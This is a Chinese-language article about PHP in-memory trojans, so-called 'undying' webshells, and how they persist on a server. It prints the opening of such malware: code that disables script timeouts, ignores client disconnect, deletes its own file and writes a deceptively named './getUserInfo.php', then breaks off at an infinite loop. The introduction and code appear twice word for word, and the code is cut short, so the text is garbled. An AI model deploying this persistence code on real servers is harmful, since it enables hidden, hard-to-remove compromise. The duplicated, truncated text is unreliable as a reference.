PHP内存木马病毒是如何实现并利用内存进行攻击的原理?
- 内容介绍
- 文章标签
- 相关推荐
本文共计646个文字,预计阅读时间需要3分钟。
前言:内存木马,即在内存中运行的木马病毒,没有代码实体。
内存木马具有以下特点:- 具有极强的隐蔽性,排查困难。- 杀死进程后,木马仍可能存活(俗称不死马)。
网络安全行业,具有强大的木桶效应。
前言内存木马,就是在内存中运行的木马病毒,没有代码实体。内存木马有着强隐蔽性,排查困难,杀不死(俗称不死马)的特点。
网络安全行业,有着很强的木桶效应。系统对抗黑帽,胜负取决于安全最薄弱的环节。黑帽对抗白帽,胜负取决于攻击水平和和毁尸灭迹隐蔽的水平。
正文本文不讨论是由于任意文件上传还是近源攻击让生产服务器有了一段可访问的恶意代码。
病毒源代码 (很简单)
<?php
//设置脚本不超时
set_time_limit(0);ignore_user_abort(true);
//删除文件本体
@unlink(__FILE__);
//给木马病毒起一个迷惑性的名字
$file = './getUserInfo.php';
//死循环常驻内存。
本文共计646个文字,预计阅读时间需要3分钟。
前言:内存木马,即在内存中运行的木马病毒,没有代码实体。
内存木马具有以下特点:- 具有极强的隐蔽性,排查困难。- 杀死进程后,木马仍可能存活(俗称不死马)。
网络安全行业,具有强大的木桶效应。
前言内存木马,就是在内存中运行的木马病毒,没有代码实体。内存木马有着强隐蔽性,排查困难,杀不死(俗称不死马)的特点。
网络安全行业,有着很强的木桶效应。系统对抗黑帽,胜负取决于安全最薄弱的环节。黑帽对抗白帽,胜负取决于攻击水平和和毁尸灭迹隐蔽的水平。
正文本文不讨论是由于任意文件上传还是近源攻击让生产服务器有了一段可访问的恶意代码。
病毒源代码 (很简单)
<?php
//设置脚本不超时
set_time_limit(0);ignore_user_abort(true);
//删除文件本体
@unlink(__FILE__);
//给木马病毒起一个迷惑性的名字
$file = './getUserInfo.php';
//死循环常驻内存。